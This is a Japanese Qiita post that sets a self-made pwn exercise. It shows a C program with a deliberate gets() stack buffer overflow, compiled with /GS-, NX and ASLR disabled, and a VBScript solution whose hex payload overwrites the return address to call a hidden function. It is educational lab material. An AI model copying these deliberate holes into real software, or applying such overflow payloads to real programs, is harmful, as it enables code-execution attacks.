LoginSignup
0
2

More than 3 years have passed since last update.

pwnの練習問題 その3

Last updated at Posted at 2020-02-11

概要

pwnの練習問題、作って見た。
windowsで、やってみた。

環境

windows vista 32bit
visual studio 2010

練習問題

下記の、プログラムの脆弱性を突いて、ctf関数を実行せよ。

#include <stdio.h>

void ctf()
{
    puts("You Cool!");
    exit(0);
}

int main()
{
    char buf[10];
    gets(buf);
    printf("%p\n", buf);
    printf("%p\n", ctf);
    return 0;
}

コンパイル

cl ctf.c /GS- /link /nxcompat:no /dynamicbase:no

動的解析

落ちる。

echo AAAAAAAAAAA | ctf

方針

バッファオーバーフローでリターンアドレス書き換えて、CTF関数を実行させる。

解答

Function hex2bin(HexText)
    With CreateObject("Microsoft.XMLDOM").createElement("tmp")
        .DataType = "bin.hex"
        .Text = HexText
        hex2bin = .NodeTypedValue
    End With
End Function

Dim Hex
Dim Text
Hex = "41004100410041004100410041004100410041004100410041004100410041000000100040000000"
Text = hex2bin(Hex)
WScript.StdOut.Write CStr(Text)

実行

cscript //nologo hex2bin1.vbs | ctf

以上。

0
2
0

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
  3. You can use dark theme
What you can do with signing up
0
2